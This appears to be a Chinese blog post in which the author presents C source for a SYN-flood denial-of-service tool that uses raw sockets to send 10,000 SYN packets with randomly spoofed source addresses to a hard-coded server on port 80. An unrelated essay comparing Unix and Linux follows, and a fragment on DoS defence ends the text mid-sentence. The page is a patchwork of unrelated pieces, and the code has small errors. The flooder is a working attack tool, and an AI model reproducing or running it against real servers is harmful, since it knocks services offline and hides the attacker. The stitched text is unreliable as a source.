今天学习了Unix/Linux网络编程的原始套接字，并完成了一个DoS（拒绝服务攻击）程序。该程序向HTTP服务器发送大量建立连接的的请求，但是不发送ack报

文，从而可以使服务器产生大量半连接。在半连接超时之前，服务器不堪重负而停止响应其它请求。当多台机器同时参与攻击时候，就办成DDoS攻击(分布式拒

绝服务攻击)。

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#define DES_PORT 80 /*欲攻击的端口为80，即HTTP端口 */
#define LOCAL_PORT 8888/*使用的本地端口*/
void send_tcp(int,struct sockaddr_in *);
int main()
{
   int sockfd;
   int on=1;
   struct sockaddr_in serveraddr;
   bzero(&serveraddr,sizeof(struct sockaddr_in));/*结构清零*/
   serveraddr.sin_family=AF_INET;/*针对Internet*/
   serveraddr.sin_port=htons(DES_PORT);/*转换*/
   /*欲攻击服务器IP为192.168.3.55*/
   if(inet_pton(AF_INET,"192.168.3.55",&serveraddr.sin_addr)!=1)
   {
      printf("wrong in inet_pthon ");
      exit(1);
   }
   /*建立原始套接字*/
   sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
   if(sockfd<0)
   {
      fprintf(stderr,"wrong in establish socket%s ",hstrerror(h_errno));
      exit(1);
   }
   /*设定套接字选项，表明IP头部自己填写*/
   setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
   setuid(getpid());/*由于原始套接字只能由root产生*/
   send_tcp(sockfd,&serveraddr);/*产生并发送报文*/
}
void send_tcp(int sockfd,struct sockaddr_in * serveraddr)
{
   char buffer[100];/*报文填写在buffer中*/
   struct ip *myip;/*指向IP头部结构的指针*/
   struct tcphdr *mytcp;/*指向TCP头部结构的指针*/
   int headerlen,i;
   bzero(buffer,sizeof(buffer));
   /*TCP+IP头部长度，由于数据长度为0，这实际也是整个包的长度*/
   headerlen=sizeof(struct ip)+sizeof(struct tcphdr);/*这里为40*/
   myip=(struct ip*)buffer;/*注意这种用法*/
   myip->ip_v=IPVERSION;/*版本为IPV4*/
   /*该字段表示头部长度，一个单位表示4个字节，所以要除以4*/
   myip->ip_hl=sizeof(struct ip)>>2;/*20除以4等于5*/
   myip->ip_tos=0;
   myip->ip_len=htons(headerlen);/*数据包总长度，这为40*/
   myip->ip_id=0;/系统自己填写*/
   myip->ip_off=0;
   myip->ip_ttl=MAXTTL;/*TTL最大为255*/
   myip->ip_p=IPPROTO_TCP;/*采用TCP协议*/
   myip->ip_sum=0;/*校验和由系统完成*/
   myip->ip_dst=serveraddr->sin_addr;/*欲攻击服务器地址*/  
   /***********以下构造TCP头部***********/
   mytcp=(struct tcphdr*)(buffer+sizeof(struct ip));/*注意这种写法，接在IP头部后填充TCP*/
   mytcp->source=htons(LOCAL_PORT);/*本地端口*/
   mytcp->dest=serveraddr->sin_port;/*目的端口*/
   mytcp->seq=random();/*随机产生任意值*/ 
   mytcp->ack_seq=0;
   mytcp->doff=sizeof(struct tcphdr)>>2;/*TCP头部长度，道理同IP*/
   mytcp->syn=1;/*表明这是TCP三次握手的第一步，需要设SYN=1和SEQ为任意值*/
   mytcp->check=0;
  /**********连续发送10000个请求连接报文*************/
   for(i=0;i<10000;i++)
   {
        myip->ip_src.s_addr=random();/*源地址随机产生，从而隐藏自己*/
        /*发送*/
        sendto(sockfd,buffer,headerlen,0,(struct sockaddr*)serveraddr,sizeof(struct sockaddr_in));
   }   
}

用Ethereal截包，截图如下

unix与linux的区别和联系

　　Linux和UNIX的最大的区别是，前者是开发源代码的自由软件，而后者是对源代码实行知识产权保护的传统商业软件。这应该是他们最大的不同，这种不同体现在用户对前者有很高的自主权，而对后者却只能去被动的适应；这种不同还表现在前者的开发是处在一个完全开放的环境之中,而后者的开发完全是处在一个黑箱之中,只有相关的开发人员才能够接触的产品的原型。

　　Linux起源于一个学生的简单需求。Linus Torvalds,Linux的作者与主要维护者，在其上大学时所买得起的唯一软件是Minix. Minix是一个类似Unix，被广泛用来辅助教学的简单操作系统。Linus 对Minix不是很满意，于是决定自己编写软件。他以学生时代熟悉的Unix作为原型， 在一台Intel 386 PC上开始了他的工作。他的进展很快，受工作成绩的鼓舞，他将这项成果通过互连网与其他同学共享，主要用于学术领域。有人看到了这个软件并开始分发。每当出现新问题时，有人会立刻找到解决办法并加入其中，很快的， Linux成为了一个操作系统。值得注意的是Linux并没有包括Unix源码。它是按照公开的POSIX标准重新编写的。Linux大量使用了由麻省剑桥免费软件基金的GNU软件，同时Linux自身也是用它们构造而成。

主要区别

1. UNIX系统大多是与硬件配套的，而Linux则可运行在多种硬件平台上.

2. UNIX是商业软件，而Linux是自由软件，免费、公开源代码的.

3. UNIX(5万美圆)而Linux免费

4. nix和linux都是操作系统的名称．但unix这四个字母除了是操作系统名称外，还作为商标归SCO所有．

5. Linux商业化的有RedHat Linux 、SuSe Linux、slakeware Linux、国内的红旗等，还有Turbo Linux.

6. Unix主要有Sun 的Solaris、IBM的AIX,　HP的HP-UX，以及x86平台的的SCO Unix/Unixware

总结：在网络管理能力和安全方面，使用过Linux的人都承认Linux与UNIX很相似。UNIX系统一直被用做高端应用或服务器系统，因此拥有一套完善的网络管理机制和规则，Linux沿用了这些出色的规则，使网络的可配置能力很强，为系统管理提供了极大的灵活性。

Linux下防范DoS攻击的方法由于拒绝服务攻击工具的泛滥 及所针对的协议层的缺陷短时无法改变的事实 拒绝服务攻击也就成为流传广泛、极难防范的一种方式